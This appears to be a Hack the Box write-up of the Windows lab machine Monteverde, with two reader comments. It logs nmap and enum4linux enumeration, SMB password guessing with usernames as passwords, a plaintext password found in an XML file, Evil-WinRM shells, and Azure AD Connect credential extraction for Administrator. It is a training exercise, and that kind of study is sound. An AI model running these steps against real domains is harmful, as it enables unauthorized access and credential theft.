by Hello, welcome back to my Hack the Box windows machine writeup series. Today we are going to do a newly released Windows box called Monteverde (IP: 10.10.10.172). The new machine is very easy to exploit as we have seen the almost similar rooting process in the previous few windows machine including the Forest machine.
Getting the user on the Monteverde is straight-forward right from the nmap scan to owning the machine. Thanks to the author this PowerShell privilege escalation exploit which made my life easy.
Let us start.
NAMP Scan
As usual, let us add machine IP 10.10.10.172 to etc/hosts as monteverde.htb and start the namp scan.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
$ nmap -sV monteverde.htb Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-14 10:12 +03 Nmap scan report for monteverde.htb (10.10.10.172) Host is up (0.18s latency). Not shown: 989 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-14 07:23:00Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=1/14%Time=5E1D69D9%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 161.69 seconds |
The nmap revealed a few ports are open. The SMB port 445, LDAP ports 389 and 3628 caught our attention. Since its a Windows machine, let us concentrate on these two ports. The tool we are going to use is enum4linux. Let us run enum4linux with -a switch to full enumeration. This option will return all the available information about the given active directory.
Enum4Linux
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 |
$ enum4linux -a 10.10.10.172 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jan 14 10:10:30 2020 ========================== | Target Information | ========================== Target ........... 10.10.10.172 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ==================================================== | Enumerating Workgroup/Domain on 10.10.10.172 | ==================================================== [E] Can't find workgroup/domain ============================================ | Nbtstat Information for 10.10.10.172 | ============================================ Looking up status of 10.10.10.172 No reply from 10.10.10.172 ===================================== | Session Check on 10.10.10.172 | ===================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437. [+] Server 10.10.10.172 allows sessions using username '', password '' Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451. [+] Got domain/workgroup name: =========================================== | Getting domain SID for 10.10.10.172 | =========================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359. Domain Name: MEGABANK Domain Sid: S-1-5-21-391775091-850290835-3566037492 [+] Host is part of a domain (not a workgroup) ====================================== | OS information on 10.10.10.172 | ====================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458. Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464. [+] Got OS info for 10.10.10.172 from smbclient: Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467. [+] Got OS info for 10.10.10.172 from srvinfo: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED ============================= | Users on 10.10.10.172 | ============================= Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866. index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2 Name: AAD_987d7f2f57d2 Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE. index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos Name: Dimitris Galanos Desc: (null) index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope Name: Mike Hope Desc: (null) index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary Name: Ray O'Leary Desc: (null) index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs Name: SABatchJobs Desc: (null) index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan Name: Sally Morgan Desc: (null) index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata Name: svc-ata Desc: (null) index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec Name: svc-bexec Desc: (null) index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp Name: svc-netapp Desc: (null) Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881. user:[Guest] rid:[0x1f5] user:[AAD_987d7f2f57d2] rid:[0x450] user:[mhope] rid:[0x641] user:[SABatchJobs] rid:[0xa2a] user:[svc-ata] rid:[0xa2b] user:[svc-bexec] rid:[0xa2c] user:[svc-netapp] rid:[0xa2d] user:[dgalanos] rid:[0xa35] user:[roleary] rid:[0xa36] user:[smorgan] rid:[0xa37] ========================================= | Share Enumeration on 10.10.10.172 | ========================================= Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640. Sharename Type Comment --------- ---- ------- SMB1 disabled -- no workgroup available [+] Attempting to map shares on 10.10.10.172 ==================================================== | Password Policy Information for 10.10.10.172 | ==================================================== [+] Attaching to 10.10.10.172 using a NULL share [+] Trying protocol 445/SMB... [+] Found domain(s): [+] MEGABANK [+] Builtin [+] Password Info for Domain: MEGABANK [+] Minimum password length: 7 [+] Password history length: 24 [+] Maximum password age: 41 days 23 hours 53 minutes [+] Password Complexity Flags: 000000 [+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0 [+] Minimum password age: 1 day 4 minutes [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: Not Set Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501. [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 7 ============================== | Groups on 10.10.10.172 | ============================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542. [+] Getting builtin groups: group:[Pre-Windows 2000 Compatible Access] rid:[0x22a] group:[Incoming Forest Trust Builders] rid:[0x22d] group:[Windows Authorization Access Group] rid:[0x230] group:[Terminal Server License Servers] rid:[0x231] group:[Users] rid:[0x221] group:[Guests] rid:[0x222] group:[Remote Desktop Users] rid:[0x22b] group:[Network Configuration Operators] rid:[0x22c] group:[Performance Monitor Users] rid:[0x22e] group:[Performance Log Users] rid:[0x22f] group:[Distributed COM Users] rid:[0x232] group:[IIS_IUSRS] rid:[0x238] group:[Cryptographic Operators] rid:[0x239] group:[Event Log Readers] rid:[0x23d] group:[Certificate Service DCOM Access] rid:[0x23e] group:[RDS Remote Access Servers] rid:[0x23f] group:[RDS Endpoint Servers] rid:[0x240] group:[RDS Management Servers] rid:[0x241] group:[Hyper-V Administrators] rid:[0x242] group:[Access Control Assistance Operators] rid:[0x243] group:[Remote Management Users] rid:[0x244] group:[Storage Replica Administrators] rid:[0x246] [+] Getting builtin group memberships: Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Group 'IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Group 'Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Group 'Guests' (RID: 546) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Group 'Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Group 'Remote Management Users' (RID: 580) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Group 'Users' (RID: 545) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542. [+] Getting local groups: group:[Cert Publishers] rid:[0x205] group:[RAS and IAS Servers] rid:[0x229] group:[Allowed RODC Password Replication Group] rid:[0x23b] group:[Denied RODC Password Replication Group] rid:[0x23c] group:[DnsAdmins] rid:[0x44d] group:[SQLServer2005SQLBrowserUser$MONTEVERDE] rid:[0x44f] group:[ADSyncAdmins] rid:[0x451] group:[ADSyncOperators] rid:[0x452] group:[ADSyncBrowse] rid:[0x453] group:[ADSyncPasswordSet] rid:[0x454] [+] Getting local group memberships: Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Group 'ADSyncAdmins' (RID: 1105) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574. Group 'Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593. [+] Getting domain groups: group:[Enterprise Read-only Domain Controllers] rid:[0x1f2] group:[Domain Users] rid:[0x201] group:[Domain Guests] rid:[0x202] group:[Domain Computers] rid:[0x203] group:[Group Policy Creator Owners] rid:[0x208] group:[Cloneable Domain Controllers] rid:[0x20a] group:[Protected Users] rid:[0x20d] group:[DnsUpdateProxy] rid:[0x44e] group:[Azure Admins] rid:[0xa29] group:[File Server Admins] rid:[0xa2e] group:[Call Recording Admins] rid:[0xa2f] group:[Reception] rid:[0xa30] group:[Operations] rid:[0xa31] group:[Trading] rid:[0xa32] group:[HelpDesk] rid:[0xa33] group:[Developers] rid:[0xa34] [+] Getting domain group memberships: Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Group 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Group 'Trading' (RID: 2610) has member: MEGABANK\dgalanos Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt Group 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2 Group 'Domain Users' (RID: 513) has member: MEGABANK\mhope Group 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp Group 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos Group 'Domain Users' (RID: 513) has member: MEGABANK\roleary Group 'Domain Users' (RID: 513) has member: MEGABANK\smorgan Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Group 'Operations' (RID: 2609) has member: MEGABANK\smorgan Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. Group 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator Group 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2 Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614. ======================================================================= | Users on 10.10.10.172 via RID cycling (RIDS: 500-550,1000-1050) | ======================================================================= Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710. [E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible. Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 742. ============================================= | Getting printer info for 10.10.10.172 | ============================================= Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 991. Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED enum4linux complete on Tue Jan 14 10:15:44 2020 # root @ ns09 in ~/htb/monteverde [10:15:44] |
So, using enum4linux, we gathered a number of users:
|
1 2 3 4 5 6 7 8 9 10 11 |
MEGABANK\Administrator MEGABANK\krbtgt MEGABANK\AAD_987d7f2f57d2 MEGABANK\mhope MEGABANK\SABatchJobs MEGABANK\svc-ata MEGABANK\svc-bexec MEGABANK\svc-netapp MEGABANK\dgalanos MEGABANK\roleary MEGABANK\smorgan |
The next step lets look at the SMB we might get something hidden there. Since we couldn’t gather any passwords, we will go for a password guessing tactic.
SMBClient
Lets us run SMBCLIENT against the users. We will use all of the users and their username as a password. After failing with 4 top users, we were able to access SMB of the user SABatchJobs.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 |
# root @ ns09 in ~/htb/monteverde [12:47:31] $ smbclient -L 10.10.10.172 -U SABatchJobs Enter WORKGROUP\SABatchJobs's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin azure_uploads Disk C$ Disk Default share E$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share users$ Disk SMB1 disabled -- no workgroup available # root @ ns09 in ~/htb/monteverde [12:47:39] $ smbclient //10.10.10.172/azure_uploads -U SABatchJobs Enter WORKGROUP\SABatchJobs's password: session setup failed: NT_STATUS_LOGON_FAILURE # root @ ns09 in ~/htb/monteverde [12:47:58] C:1 $ smbclient //10.10.10.172/azure_uploads -U SABatchJobs Enter WORKGROUP\SABatchJobs's password: Try "help" to get a list of possible commands. smb: \> dir . D 0 Fri Jan 3 15:43:06 2020 .. D 0 Fri Jan 3 15:43:06 2020 524031 blocks of size 4096. 519955 blocks available smb: \> ^Z [1] + 4579 suspended smbclient //10.10.10.172/azure_uploads -U SABatchJobs # root @ ns09 in ~/htb/monteverde [12:48:31] C:148 $ smbclient //10.10.10.172/users$ -U SABatchJobs Enter WORKGROUP\SABatchJobs's password: Try "help" to get a list of possible commands. smb: \> dir . D 0 Fri Jan 3 16:12:48 2020 .. D 0 Fri Jan 3 16:12:48 2020 dgalanos D 0 Fri Jan 3 16:12:30 2020 mhope D 0 Fri Jan 3 16:41:18 2020 roleary D 0 Fri Jan 3 16:10:30 2020 smorgan D 0 Fri Jan 3 16:10:24 2020 524031 blocks of size 4096. 519955 blocks available smb: \> |
The user had few directories listed, the directory azure_uploads had nothing in it, but interestingly user SABatchJobs has access to a directory called users$. Let us connect and see what other users have in their directories.
Getting User.txt
After a couple of minute’s enumeration, we found a file azure.xml in the user mhope’s directory. Let us download and see what it is.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
$ smbclient //10.10.10.172/users$ -U SABatchJobs Enter WORKGROUP\SABatchJobs's password: Try "help" to get a list of possible commands. smb: \> dir . D 0 Fri Jan 3 16:12:48 2020 .. D 0 Fri Jan 3 16:12:48 2020 dgalanos D 0 Fri Jan 3 16:12:30 2020 mhope D 0 Fri Jan 3 16:41:18 2020 roleary D 0 Fri Jan 3 16:10:30 2020 smorgan D 0 Fri Jan 3 16:10:24 2020 524031 blocks of size 4096. 519955 blocks available smb: \> cd dgalanos smb: \dgalanos\> dir . D 0 Fri Jan 3 16:12:30 2020 .. D 0 Fri Jan 3 16:12:30 2020 524031 blocks of size 4096. 519955 blocks available smb: \dgalanos\> cd .. smb: \> cd mhope smb: \mhope\> dir . D 0 Fri Jan 3 16:41:18 2020 .. D 0 Fri Jan 3 16:41:18 2020 azure.xml AR 1212 Fri Jan 3 16:40:23 2020 524031 blocks of size 4096. 519955 blocks available smb: \mhope\> |
The XML file contains a password “4n0therD4y@n0th3r$“, which could be of user MHope’s.
Now we have a possible valid password, its time to use our favorite tool “Evil-WinRM“.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
# root @ ns09 in ~/htb/monteverde [10:35:52] $ ruby evil-winrm.rb -u mhope -p 4n0therD4y@n0th3r$ -i 10.10.10.172 Evil-WinRM shell v1.8 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\mhope\Documents> cd / *Evil-WinRM* PS C:\> cd Users/mhope/Desktop *Evil-WinRM* PS C:\Users\mhope\Desktop> dir Directory: C:\Users\mhope\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 1/3/2020 5:48 AM 32 user.txt *Evil-WinRM* PS C:\Users\mhope\Desktop> more user.txt 496197[-----------------]12f2 |
We got the user.txt from the user MHopes desktop.
Straight To the Root
Like we do sudo -l in Linux, we do whoami /all to see the which are the group our user belongs to. Running the command we found the following.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 |
*Evil-WinRM* PS C:\> whoami /all USER INFORMATION ---------------- User Name SID ============== ============================================ megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601 GROUP INFORMATION ----------------- Group Name Type SID Attributes =========================================== ================ ============================================ ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group MEGABANK\Azure Admins Group S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448 PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled USER CLAIMS INFORMATION ----------------------- User claims unknown. Kerberos support for Dynamic Access Control on this device has been disabled. |
The command shows the user MHope is a member of the Azure Admin group. It means he probably has administrator rights.
After a simple Google search, we come across a PowerShell privesc tool called “AzureADConnect“. The script returns the Administrator credential immediately.
This script seems to be working locally post exploit, because I tried to run directly from my Kali terminal, but without success. So, I copied the script to Desktop of user Mhope and run from there.
So, now we obtained the Administrator credentials, let us run the Evil-WinRM again as Administrator and get the root flag.
|
1 2 3 4 5 6 7 |
# root @ ns09 in ~/htb/monteverde [13:44:27] $ ruby evil-winrm.rb -u Administrator -p d0m@in4dminyeah! -i 10.10.10.172 Evil-WinRM shell v1.8 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> more C:\Users\Administrator\Desktop\root.txt 1290[--------------]804a0bc *Evil-WinRM* PS C:\Users\Administrator\Documents> |
That’s it, thank you for reading.
That powershell script you found that does it all for you didn’t exist until yesterday. No wonder you thought it should have been marked as an Easy box when all you had to do was run that to instantly get admin creds lol there was a very similar powershell script available before that, but it at least required a little work to get it to run (figuring out that the AD Sync database was hosted on full SQL not LocalDb and then changing the SQL connection string in the script accordingly).
I’m lucky to find the script as a first result in the Google serp. However, dont you think, we somehow tend to use readymade scripts/ tools in our day-to-day tasks?